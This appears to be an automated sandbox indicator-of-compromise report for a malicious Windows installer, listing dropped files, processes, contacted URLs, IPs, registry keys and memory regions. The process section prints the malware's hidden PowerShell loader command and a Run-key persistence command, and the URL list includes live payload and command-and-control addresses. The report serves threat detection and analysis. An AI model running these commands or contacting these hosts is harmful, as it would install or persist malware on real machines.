IOC Report
160420241245287.exe

loading gif

Files

File Path
Type
Category
Malicious
160420241245287.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Untapestried.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf
ASCII text, with very long lines (65536), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\tailors.ver
DOS executable (COM)
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\545Ni1I
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\Untapestried.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4aiyf0sq.2em.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmgewwff.qui.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\nsz69A6.tmp
OpenPGP Public Key
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Nonascription80.gau
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Palter102.sus
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Pottinger.qua
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Retranslating88.spo
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Stachyose225.pen
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Superabhor153.gru
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Toparchia26.hem
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\Trilaurin91.yep
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\aarsindkomstens.pac
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\afspilleudstyr.txt
ASCII text, with very long lines (432), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Angelsakserens\Satsfremstillings\amperemetrenes.bef
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Dkningskontrol\Grfabrikken.ind
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Pleasingly\Merosomal\Storkunderabatternes\metoac\Hexobiose.pri
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Pleasingly\Merosomal\Storkunderabatternes\metoac\Kogevaskens.uva
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Pleasingly\Merosomal\Storkunderabatternes\metoac\Liquidated161.gas
Dyalog APL component file 32-bit level 2 journaled checksummed version -44.2
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Aldehydet209.jum
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\striper.Gui
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\explosimeter.adv
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\eyeletter.ove
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\lntrykkers.sol
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\microspectrophotometers.fol
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\nakkede.rat
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\operationssygeplejerskerne.nin
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\orthodontic.vel
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\produktionscheferne.eks
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\rdgrden.ber
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\rinch.kon
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\Udtydedes\Intendant\bumaree\sanseredskaberne.cat
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\antipyic.pre
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\appeldomstolene.slu
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\barsles.gab
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\beskyttelsestoldsatsers.afl
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\blandingerne.sly
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\catalogue.str
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\christierns.sej
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\skraverings.tyl
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\tillidsposter.dox
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\unavailed.etp
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs\vindmlleprojekters.laz
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\dacryohemorrhea.udt
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\damnificatus.uge
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\epispadiac.kal
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\equality.kon
data
dropped
C:\Users\user\AppData\Roaming\opbevaringssteder\etape.sil
data
dropped
There are 45 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\160420241245287.exe
"C:\Users\user\Desktop\160420241245287.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
malicious
C:\Users\user\AppData\Local\Temp\Untapestried.exe
"C:\Users\user\AppData\Local\Temp\Untapestried.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
malicious
C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe"
malicious
C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
"C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
http://n-benriya002.com/9pdo/?edR0hF=REEnkW6M
unknown
https://duckduckgo.com/ac/?q=
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.eternalsunrise.xyz
unknown
https://contoso.com/License
unknown
http://www.ejbodyart.com/9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU=
112.175.50.218
https://contoso.com/Icon
unknown
http://www.jt-berger.store/9pdo/
217.160.0.183
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://www.ftp.ftp://ftp.gopher.
unknown
http://www.n-benriya002.com/9pdo/
219.94.128.41
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://www.ecosia.org/newtab/
unknown
https://aka.ms/pscore6lBqq
unknown
https://github.com/Pester/Pester
unknown
http://www.jt-berger.store/9pdo/?edR0hF=9/X38tn9qLO2xSF02XNB/rY3zD6RCSMCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFniev+GXC9dB/42VqWS3YgLMlW8u3PKxI03yuVQ=&jzuh=7Bfls2
217.160.0.183
http://103.14.155.180/CkkRLCTUxW193.binO
unknown
http://www.n-benriya002.com/9pdo/?edR0hF=REEnkW6M+TEq7R0RTFAEOK6A593ZXFJD8cCdAclTZkEAO29Celit1EJdRt8L6G9Xd5xqtutsMklg2OrtOvYkqvTyuEt4cazTHdJ4IhgWhtZseUa+ZlJk5aI=&jzuh=7Bfls2
219.94.128.41
http://103.14.155.180/CkkRLCTUxW193.bin3c
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
unknown
http://103.14.155.180/CkkRLCTUxW193.bin
103.14.155.180
http://103.14.155.180/i
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
http://103.14.155.180/It3
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
unknown
http://www.scwspark.com/9pdo/
81.88.63.46
http://103.14.155.180/
unknown
http://103.14.155.180/NTIFIER=Intel64
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://www.scwspark.com/9pdo/?edR0hF=exLCvVI2E5RJM8xtzs4Hapiqzu/uGv/f+6d2cWgRCMmdoFVcUWazUq40e3zK6s54E+NAVH76kqhd1uh4f2sEtFmHSsWrMW9P35+QXkOmQzbQkkc9XIR6mDA=&jzuh=7Bfls2
81.88.63.46
http://www.eternalsunrise.xyz/9pdo/
66.29.135.159
http://103.14.155.180/CkkRLCTUxW193.bin.
unknown
There are 31 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.eternalsunrise.xyz
66.29.135.159
malicious
www.ejbodyart.com
unknown
malicious
www.n-benriya002.com
unknown
malicious
ejbodyart.com
112.175.50.218
n-benriya002.com
219.94.128.41
www.scwspark.com
81.88.63.46
www.jt-berger.store
217.160.0.183

IPs

IP
Domain
Country
Malicious
66.29.135.159
www.eternalsunrise.xyz
United States
malicious
103.14.155.180
unknown
unknown
219.94.128.41
n-benriya002.com
Japan
81.88.63.46
www.scwspark.com
Italy
217.160.0.183
www.jt-berger.store
Germany
112.175.50.218
ejbodyart.com
Korea Republic of

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\bombens\blacklead
amical
HKEY_CURRENT_USER\SOFTWARE\spilledaases\hacks
Iodizers
HKEY_CURRENT_USER\Ciconiform
Syskerne
HKEY_CURRENT_USER\Environment
Divergente
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Lgplante

Memdumps

Base Address
Regiontype
Protect
Malicious
1100000
system
page execute and read and write
malicious
2830000
system
page execute and read and write
malicious
21220000
unclassified section
page execute and read and write
malicious
201B0000
unclassified section
page execute and read and write
malicious
2EB0000
trusted library allocation
page read and write
malicious
3350000
unkown
page execute and read and write
malicious
2E70000
trusted library allocation
page read and write
malicious
BC43000
direct allocation
page execute and read and write
malicious
2D71000
heap
page read and write
2A35000
heap
page read and write
329A000
trusted library allocation
page execute and read and write
A75C1FB000
stack
page read and write
7460000
heap
page read and write
407000
unkown
page readonly
4D27000
heap
page read and write
1EC11B00000
trusted library allocation
page read and write
2D71000
heap
page read and write
6817000
trusted library allocation
page read and write
1EC11AE0000
heap
page read and write
48A000
unkown
page readonly
2D71000
heap
page read and write
21FE000
stack
page read and write
3AE4000
unclassified section
page read and write
20170000
direct allocation
page read and write
1EC11C16000
trusted library allocation
page read and write
2D71000
heap
page read and write
85DE000
stack
page read and write
28D4000
heap
page read and write
79AE000
stack
page read and write
A4E000
unkown
page readonly
409000
unkown
page write copy
71E0000
direct allocation
page read and write
4CFF000
stack
page read and write
1200000
unkown
page readonly
5E4000
unkown
page write copy
1FDFF000
stack
page read and write
100F2000
system
page read and write
2A4C000
heap
page read and write
7B20000
trusted library allocation
page execute and read and write
2D71000
heap
page read and write
510000
heap
page read and write
5F2000
unkown
page write copy
29CA000
heap
page read and write
2D71000
heap
page read and write
2C98000
heap
page read and write
24A0000
heap
page read and write
A4E000
unkown
page readonly
2D71000
heap
page read and write
4810000
direct allocation
page read and write
2023A000
heap
page read and write
366F000
unkown
page read and write
A843000
direct allocation
page execute and read and write
3C76000
unclassified section
page read and write
2D71000
heap
page read and write
3030000
trusted library allocation
page read and write
2D71000
heap
page read and write
7F790000
trusted library allocation
page execute and read and write
2D71000
heap
page read and write
565000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
20323000
heap
page read and write
304F000
heap
page read and write
4490000
heap
page read and write
A57000
unkown
page readonly
3360000
heap
page readonly
2D71000
heap
page read and write
7705000
heap
page read and write
641E000
stack
page read and write
2840000
heap
page read and write
A41000
unkown
page execute read
2784000
heap
page read and write
2CD2000
unkown
page read and write
7210000
direct allocation
page read and write
89C0000
heap
page read and write
2D71000
heap
page read and write
A57000
unkown
page readonly
2F8D000
stack
page read and write
218B0000
unclassified section
page execute and read and write
10032000
system
page read and write
32A5000
trusted library allocation
page execute and read and write
7EDE000
stack
page read and write
32A2000
trusted library allocation
page read and write
42B000
unkown
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
294F000
stack
page read and write
D2F000
stack
page read and write
B90000
unkown
page readonly
2BE0000
unkown
page readonly
E0B000
unkown
page read and write
2D71000
heap
page read and write
769A000
heap
page read and write
34E2000
unclassified section
page read and write
2A22000
heap
page read and write
518000
heap
page read and write
B4A000
stack
page read and write
F00000
heap
page read and write
4771000
heap
page read and write
11E0000
unkown
page read and write
2D71000
heap
page read and write
2029C000
heap
page read and write
7C30000
heap
page read and write
7B6C000
stack
page read and write
80E000
stack
page read and write
E9E000
unkown
page read and write
B243000
direct allocation
page execute and read and write
2D71000
heap
page read and write
8600000
trusted library allocation
page read and write
A55000
unkown
page read and write
2A03000
heap
page read and write
2D71000
heap
page read and write
2690000
unkown
page readonly
7446000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
1EC11C12000
trusted library allocation
page read and write
1EC10223000
heap
page read and write
353C000
unclassified section
page read and write
46F0000
heap
page read and write
8904000
heap
page read and write
2D71000
heap
page read and write
24FB000
stack
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
44A000
unkown
page readonly
2D71000
heap
page read and write
2FC6000
heap
page read and write
7C45000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
8B00000
trusted library allocation
page read and write
71B0000
direct allocation
page read and write
85F0000
trusted library allocation
page execute and read and write
2A1F000
heap
page read and write
3422000
unclassified section
page read and write
2E98000
stack
page read and write
6220000
trusted library allocation
page read and write
8900000
heap
page read and write
1FB9D000
stack
page read and write
78E000
stack
page read and write
887C000
stack
page read and write
2950000
unkown
page execute and read and write
89A6000
heap
page read and write
2D71000
heap
page read and write
2E5C000
stack
page read and write
7AE0000
trusted library allocation
page read and write
2A88000
heap
page read and write
2C90000
heap
page read and write
2D71000
heap
page read and write
2044C000
heap
page read and write
7205000
heap
page execute and read and write
EF0000
unkown
page readonly
1EC11D01000
trusted library allocation
page read and write
1280000
unkown
page readonly
1EC11DA5000
trusted library allocation
page read and write
A01000
unkown
page readonly
8500000
heap
page read and write
2D92000
unkown
page read and write
48A000
unkown
page readonly
7A70000
trusted library allocation
page read and write
303E000
heap
page read and write
2D71000
heap
page read and write
3F9A000
unclassified section
page read and write
2300000
heap
page read and write
3030000
trusted library allocation
page read and write
1178000
system
page execute and read and write
2EA2000
heap
page read and write
400000
unkown
page readonly
7440000
heap
page read and write
29BF000
heap
page read and write
5071000
trusted library allocation
page read and write
78C0000
trusted library allocation
page read and write
2D71000
heap
page read and write
20812000
direct allocation
page execute and read and write
2D71000
heap
page read and write
71A000
heap
page read and write
2D71000
heap
page read and write
1000000
unkown
page read and write
F07000
heap
page read and write
46C0000
direct allocation
page read and write
2D71000
heap
page read and write
AC0000
unkown
page readonly
7C31000
heap
page read and write
274D000
stack
page read and write
4800000
direct allocation
page read and write
2CB6000
heap
page read and write
1EC11DC4000
trusted library allocation
page read and write
1FDBE000
stack
page read and write
10004000
unkown
page readonly
29BB000
heap
page read and write
2D71000
heap
page read and write
1FEA0000
direct allocation
page read and write
2A60000
heap
page read and write
2D71000
heap
page read and write
78D0000
trusted library allocation
page read and write
2D71000
heap
page read and write
32C0000
trusted library allocation
page read and write
400000
unkown
page readonly
2D71000
heap
page read and write
2D71000
heap
page read and write
1EC1020C000
heap
page read and write
44A000
unkown
page readonly
4960000
heap
page read and write
DF7000
heap
page read and write
A30000
unkown
page readonly
9F0000
unkown
page read and write
7E5C000
stack
page read and write
6071000
trusted library allocation
page read and write
2D71000
heap
page read and write
5672000
trusted library allocation
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
4547000
heap
page read and write
1020000
heap
page read and write
767000
heap
page read and write
2230000
heap
page read and write
201F0000
heap
page read and write
2D71000
heap
page read and write
3350000
heap
page read and write
BA0000
unkown
page readonly
28B0000
heap
page read and write
621A000
trusted library allocation
page read and write
2D71000
heap
page read and write
28D4000
heap
page read and write
37A0000
heap
page read and write
22DC000
stack
page read and write
3290000
trusted library allocation
page read and write
2D71000
heap
page read and write
1EC10223000
heap
page read and write
2D71000
heap
page read and write
5D0000
unkown
page readonly
1EC11AF0000
trusted library allocation
page read and write
30C0000
heap
page read and write
5EC000
unkown
page write copy
5B0000
unkown
page readonly
30FF000
stack
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
4C0000
heap
page read and write
2CD2000
unkown
page read and write
BFE000
stack
page read and write
2D71000
heap
page read and write
29C9000
heap
page read and write
2CB4000
heap
page read and write
30EA000
heap
page read and write
407000
unkown
page readonly
3260000
trusted library allocation
page read and write
7160000
direct allocation
page read and write
7C3B000
heap
page read and write
2D71000
heap
page read and write
A75D9FE000
stack
page read and write
4771000
heap
page read and write
3273000
trusted library allocation
page execute and read and write
6207000
trusted library allocation
page read and write
1660000
remote allocation
page execute and read and write
4890000
direct allocation
page read and write
7150000
direct allocation
page read and write
83A000
stack
page read and write
2D71000
heap
page read and write
7C48000
heap
page read and write
2D71000
heap
page read and write
1EC11C00000
trusted library allocation
page read and write
4787000
heap
page read and write
3390000
heap
page read and write
A57000
unkown
page readonly
3270000
trusted library allocation
page read and write
2A20000
unkown
page read and write
28D4000
heap
page read and write
2A84000
heap
page read and write
70000
heap
page read and write
7A60000
trusted library allocation
page read and write
767E000
heap
page read and write
2A4F000
heap
page read and write
2A99000
heap
page read and write
774A000
heap
page read and write
9F0000
unkown
page read and write
2D71000
heap
page read and write
A75D1FE000
stack
page read and write
1EC10170000
heap
page read and write
857E000
stack
page read and write
47F0000
direct allocation
page read and write
2D71000
heap
page read and write
71F0000
direct allocation
page read and write
2079D000
direct allocation
page execute and read and write
2D71000
heap
page read and write
7C5E000
heap
page read and write
843F000
stack
page read and write
2D71000
heap
page read and write
2780000
heap
page read and write
1803000
remote allocation
page execute and read and write
33AB000
heap
page read and write
334E000
stack
page read and write
BA0000
unkown
page readonly
2784000
heap
page read and write
2D71000
heap
page read and write
867F000
stack
page read and write
469F000
stack
page read and write
7AD0000
trusted library allocation
page read and write
465E000
stack
page read and write
2D71000
heap
page read and write
3280000
trusted library allocation
page read and write
2D71000
heap
page read and write
29A0000
unkown
page read and write
4C7E000
stack
page read and write
401000
unkown
page execute read
36B8000
unkown
page read and write
7E9E000
stack
page read and write
1EC11C03000
trusted library allocation
page read and write
7190000
direct allocation
page read and write
2C03000
remote allocation
page execute and read and write
2D71000
heap
page read and write
796E000
stack
page read and write
1FD7F000
stack
page read and write
9E43000
direct allocation
page execute and read and write
1EC100A0000
system
page execute and read and write
2D71000
heap
page read and write
339D000
direct allocation
page execute and read and write
AD0000
unkown
page readonly
2A80000
heap
page read and write
3790000
heap
page read and write
2284000
heap
page read and write
3220000
heap
page read and write
4830000
direct allocation
page read and write
4CBE000
stack
page read and write
2D71000
heap
page read and write
5E8000
unkown
page write copy
1EC101F0000
heap
page read and write
2D71000
heap
page read and write
475D000
heap
page read and write
2D71000
heap
page read and write
F07000
heap
page read and write
2D71000
heap
page read and write
2A22000
heap
page read and write
DF0000
heap
page read and write
4545000
heap
page read and write
1EC11DCE000
trusted library allocation
page read and write
7180000
direct allocation
page read and write
B80000
unkown
page readonly
339E000
stack
page read and write
3085000
heap
page read and write
29C4000
heap
page read and write
2D71000
heap
page read and write
1020000
heap
page read and write
89B0000
heap
page read and write
4781000
heap
page read and write
2D71000
heap
page read and write
2A14000
heap
page read and write
48A0000
direct allocation
page read and write
2A3B000
heap
page read and write
304B000
heap
page read and write
2A00000
unkown
page readonly
2D71000
heap
page read and write
30E0000
heap
page read and write
755000
heap
page read and write
494D000
stack
page read and write
3030000
trusted library allocation
page read and write
2D71000
heap
page read and write
88BE000
stack
page read and write
2D71000
heap
page read and write
1FD3E000
stack
page read and write
853F000
stack
page read and write
1EC11C0F000
trusted library allocation
page read and write
29C2000
heap
page read and write
8610000
trusted library allocation
page read and write
8520000
trusted library allocation
page read and write
A55000
unkown
page read and write
31FD000
direct allocation
page execute and read and write
8921000
heap
page read and write
1FED0000
direct allocation
page read and write
2A28000
heap
page read and write
2D71000
heap
page read and write
1590000
unkown
page readonly
2D71000
heap
page read and write
764E000
stack
page read and write
2D71000
heap
page read and write
859E000
stack
page read and write
2016C000
stack
page read and write
9A0000
heap
page read and write
2A14000
heap
page read and write
2D71000
heap
page read and write
2FE0000
heap
page read and write
2EF0000
trusted library allocation
page read and write
477C000
heap
page read and write
7C65000
heap
page read and write
3010000
heap
page read and write
2D7F000
heap
page read and write
5D0000
unkown
page readonly
84F7000
stack
page read and write
1590000
unkown
page readonly
7C6A000
heap
page read and write
2F22000
heap
page read and write
8775000
trusted library allocation
page read and write
568E000
trusted library allocation
page read and write
54DC000
stack
page read and write
304A000
heap
page read and write
1153000
system
page execute and read and write
2A82000
heap
page read and write
1FCC0000
heap
page read and write
833D000
stack
page read and write
207A1000
direct allocation
page execute and read and write
2D71000
heap
page read and write
1011000
unkown
page readonly
33A0000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
AD0000
unkown
page readonly
70EE000
stack
page read and write
83A000
stack
page read and write
2A35000
heap
page read and write
2DEC000
unkown
page read and write
400000
unkown
page readonly
2D71000
heap
page read and write
1EC11AF0000
trusted library allocation
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
A4E000
unkown
page readonly
EF0000
unkown
page readonly
2D71000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2D60000
heap
page read and write
2D71000
heap
page read and write
6099000
trusted library allocation
page read and write
106F4000
system
page read and write
476C000
heap
page read and write
8B10000
direct allocation
page execute and read and write
2D71000
heap
page read and write
31F9000
direct allocation
page execute and read and write
2B40000
heap
page read and write
4781000
heap
page read and write
7C31000
heap
page read and write
407000
unkown
page readonly
205FD000
direct allocation
page execute and read and write
A0F000
stack
page read and write
7200000
heap
page execute and read and write
5688000
trusted library allocation
page read and write
30D0000
direct allocation
page execute and read and write
2D71000
heap
page read and write
561E000
stack
page read and write
7AB0000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
7A40000
trusted library allocation
page execute and read and write
7C7F000
heap
page read and write
2D71000
heap
page read and write
7B00000
trusted library allocation
page read and write
2A59000
heap
page read and write
476C000
heap
page read and write
B90000
unkown
page read and write
1FEC0000
direct allocation
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
990000
unkown
page readonly
7C20000
trusted library allocation
page read and write
330E000
stack
page read and write
240E000
stack
page read and write
115C000
system
page execute and read and write
2A4C000
heap
page read and write
78F0000
trusted library allocation
page read and write
2A14000
heap
page read and write
670000
heap
page read and write
2F8F000
stack
page read and write
29BF000
heap
page read and write
626000
unkown
page write copy
710000
heap
page read and write
7A2D000
stack
page read and write
2840000
heap
page read and write
4771000
heap
page read and write
9A0000
heap
page read and write
7EF0000
heap
page read and write
7220000
direct allocation
page read and write
2A1F000
heap
page read and write
2A03000
heap
page read and write
7C74000
heap
page read and write
55DF000
stack
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2A22000
heap
page read and write
2D71000
heap
page read and write
2F90000
heap
page read and write
79EE000
stack
page read and write
980000
unkown
page readonly
7C36000
heap
page read and write
2B3E000
stack
page read and write
7920000
heap
page execute and read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
401000
unkown
page execute read
894F000
heap
page read and write
A30000
unkown
page readonly
3350000
heap
page execute and read and write
4778000
heap
page read and write
2D71000
heap
page read and write
28D0000
heap
page read and write
19A000
stack
page read and write
2F00000
heap
page read and write
5EE000
unkown
page write copy
2D71000
heap
page read and write
327D000
trusted library allocation
page execute and read and write
8530000
trusted library allocation
page read and write
401000
unkown
page execute read
2D71000
heap
page read and write
51C6000
trusted library allocation
page read and write
F00000
heap
page read and write
93C000
stack
page read and write
4870000
direct allocation
page read and write
2A35000
heap
page read and write
2AFD000
stack
page read and write
27FE000
unkown
page read and write
476E000
heap
page read and write
1FEB0000
direct allocation
page read and write
20820000
unclassified section
page execute and read and write
30A2000
heap
page read and write
48A000
unkown
page readonly
29D3000
heap
page read and write
300E000
stack
page read and write
A4E000
unkown
page readonly
29B9000
heap
page read and write
1EC1021B000
heap
page read and write
2D71000
heap
page read and write
10003000
unkown
page read and write
2D71000
heap
page read and write
B90000
unkown
page readonly
71C0000
direct allocation
page read and write
4860000
direct allocation
page read and write
55E000
stack
page read and write
7AA0000
trusted library allocation
page read and write
A40000
unkown
page readonly
2D71000
heap
page read and write
60DB000
trusted library allocation
page read and write
4D0000
heap
page read and write
560000
heap
page read and write
7C29000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
8630000
trusted library allocation
page read and write
2305000
heap
page read and write
2D71000
heap
page read and write
2A1F000
heap
page read and write
30AC000
heap
page read and write
2D71000
heap
page read and write
A55000
unkown
page read and write
10001000
unkown
page execute read
2290000
heap
page read and write
1049000
unkown
page write copy
2A40000
heap
page read and write
F1F000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
7910000
trusted library allocation
page read and write
76AA000
heap
page read and write
2D71000
heap
page read and write
7140000
direct allocation
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
1EC100C6000
system
page execute and read and write
30AD000
stack
page read and write
2D71000
heap
page read and write
201B0000
direct allocation
page read and write
4840000
direct allocation
page read and write
2D71000
heap
page read and write
29C0000
unkown
page read and write
4BE0000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
7900000
trusted library allocation
page read and write
409000
unkown
page read and write
B4A000
stack
page read and write
2D71000
heap
page read and write
3289000
trusted library allocation
page read and write
2D71000
heap
page read and write
28A0000
heap
page read and write
2A59000
heap
page read and write
8620000
trusted library allocation
page read and write
3300000
heap
page read and write
DF0000
heap
page read and write
660000
heap
page read and write
1280000
unkown
page readonly
4B8C000
stack
page read and write
7A30000
trusted library allocation
page read and write
2D71000
heap
page read and write
2D71000
heap
page read and write
2A0E000
heap
page read and write
2A0E000
heap
page read and write
1EC11D00000
trusted library allocation
page read and write
4D20000
heap
page read and write
8990000
heap
page read and write
A40000
unkown
page readonly
A75E1FE000
stack
page read and write
2D71000
heap
page read and write
2690000
